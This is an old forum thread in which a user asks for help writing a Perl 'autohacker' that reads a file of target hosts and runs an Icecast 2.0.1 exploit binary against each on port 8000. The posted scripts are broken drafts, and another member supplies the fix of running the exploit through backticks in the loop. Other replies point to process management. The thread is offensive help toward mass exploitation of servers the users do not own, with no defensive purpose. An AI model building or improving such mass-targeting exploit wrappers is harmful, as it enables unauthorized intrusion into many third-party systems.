ShouiZen
i want create on my cygwin . i want from a list use my exploit but automatically ?
it s possible ??
RedShadow
uhh i didnt really understand your post but if you want a auto hacker on nix you could use bsh perl or C
ShouiZen
I WANT TO DO IN PERL WHICH FUNCTION i use to read the file (file.txt)? line by line?
ShouiZen
i post my script but i thin ther is a error how do you excute the exploits look at my code

#!/usr/bin/perl
use IO::Socket;

print "Icecast 2.0.1\n".
" new exploit autohacker 2004 octobre 2004\n".
" by FX totof\n";

print " Entre le nom de ton fichier";
$file= <STDIN>;

open(TOTO,$file) ¦¦ die ("Erreur d'ouverture $file") ;

while (<TOTO>) {

ex_icecast -h $_ -p 8000;
}

close(TOTO);

or

#!/usr/bin/perl
use IO::Socket;

print "Icecast 2.0.1\n".
" new exploit autohacker 2004 octobre 2004\n".
" by FX totof\n";

print " Entre le nom de ton fichier";
$file= <STDIN>;

open(TOTO,$file) ¦¦ die ("Erreur d'ouverture $file") ;

while (<TOTO>) {

./ex_icecast -h $_ -p 8000; # or that

}

close(TOTO);

help me ??
ShouiZen
any idea
lipton
try looking up process management on google
ShouiZen
thank you man biggrin.gif
macman
Take it the highlighted bit is the problem...
use backticks

i.e.

whilewhile (<TOTO>) {

`ex_icecast -h $_ -p 8000`
}
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.